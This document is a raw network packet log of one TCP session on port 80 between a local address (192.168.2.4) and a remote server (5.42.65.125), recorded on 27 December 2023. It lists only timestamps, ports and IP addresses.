Dec 27, 2023 18:12:25.399980068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399991989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399993896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.400022030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.400036097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.400070906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400079012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400089979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400095940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400101900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400114059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.400116920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400124073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400130987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400137901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400146008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.400157928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.400561094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400568962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400609970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400609970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.400619030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400645971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.400782108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400789976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400800943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400806904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400814056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400820017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400825977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400830984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.400834084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400840998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400865078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.400868893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400876999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400885105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400891066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400892019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.400897980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400909901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400916100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.400934935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.400957108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.400966883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400974989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400985956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.400993109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401000023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401021957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.401036024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.401485920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401494026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401505947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401513100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401519060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401535034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.401551008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.401603937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401612043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401618958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401626110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401638985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401644945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.401659966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.401711941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401720047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401731014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401737928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401750088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401757002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.401757956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401765108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401787996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.401804924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.401813030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401819944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401827097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401833057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401845932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401851892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401854992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.401858091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401865959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401874065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.401881933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.401915073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.402455091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402559996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402565956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402573109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.402602911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.402606010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402614117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402625084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402632952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402652979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.402667999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.402678013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402686119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402712107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.402864933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402872086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402882099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402889013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402895927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402906895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402911901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.402915001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402928114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402930021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.402935028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402942896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402945995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.402951002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402966976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402966976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.402987003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.402987957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.403002024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.403003931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.403011084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.403032064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.403673887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.403681993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.403688908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.403717995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.403726101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.403733015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.403738976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.403744936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.403762102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.403765917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.403769970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.403791904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.403805017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.403810978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.403841019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.403847933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.403877020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.403879881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.403923035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.403933048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.403954983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404007912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404083967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404086113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.404092073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404104948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404112101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404124022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404126883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.404129982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404145956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.404149055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404155970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404170990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404187918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404192924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.404216051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.404448032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404455900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404469013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404494047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.404510975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404517889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404530048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404551029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.404596090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404603004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404609919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404614925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404628038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404634953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404640913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.404670954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.404783010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404789925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404800892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404807091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404814959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404825926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.404825926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404833078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404844999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404850960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.404850960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404859066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404865980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404872894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.404881001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.404881001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.404897928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.405210972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405217886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405236959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405242920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405258894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.405261040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405291080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405294895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.405309916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.405318022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405349970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.405363083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405369997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405396938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.405459881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405467987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405479908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405486107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405493021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405507088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.405522108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.405582905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405590057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405601025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405606985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405613899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405626059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.405628920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405637980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405648947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405648947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.405657053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405668020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405674934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405675888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.405687094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.405692101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.405715942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.406178951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406187057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406198978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406205893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406225920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.406230927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406270027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.406292915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406301022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406313896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406321049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406338930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.406339884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406364918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.406512022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406518936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406524897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406531096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406543016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406544924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.406549931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406557083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406564951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.406568050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406574965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406575918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.406580925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406589031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406596899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406603098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406606913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.406610966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.406636000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.406647921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.407080889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407140017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407146931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407183886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407183886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.407191992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407198906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407222986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.407242060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407249928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407260895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407278061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407284975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407286882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.407293081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407318115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.407326937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407335043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407346010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407362938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407370090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.407370090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407377958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407392979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.407418013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407418966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.407444000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407448053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.407452106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407488108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.407558918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407566071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407577038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407582998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407591105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.407604933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.407623053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.408009052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408016920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408027887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408055067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.408055067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408122063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408129930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408140898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408145905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408153057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408168077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.408183098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408189058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408191919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.408216000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.408229113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408267021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408274889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408291101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408298016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408304930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408310890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.408334970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.408349991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.408360958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408366919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408380032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408385992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408404112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.408427954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.408459902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408467054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408500910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.408512115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408936024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408942938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408961058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408978939 CET	49738	80	192.168.2.4	5.42.65.125
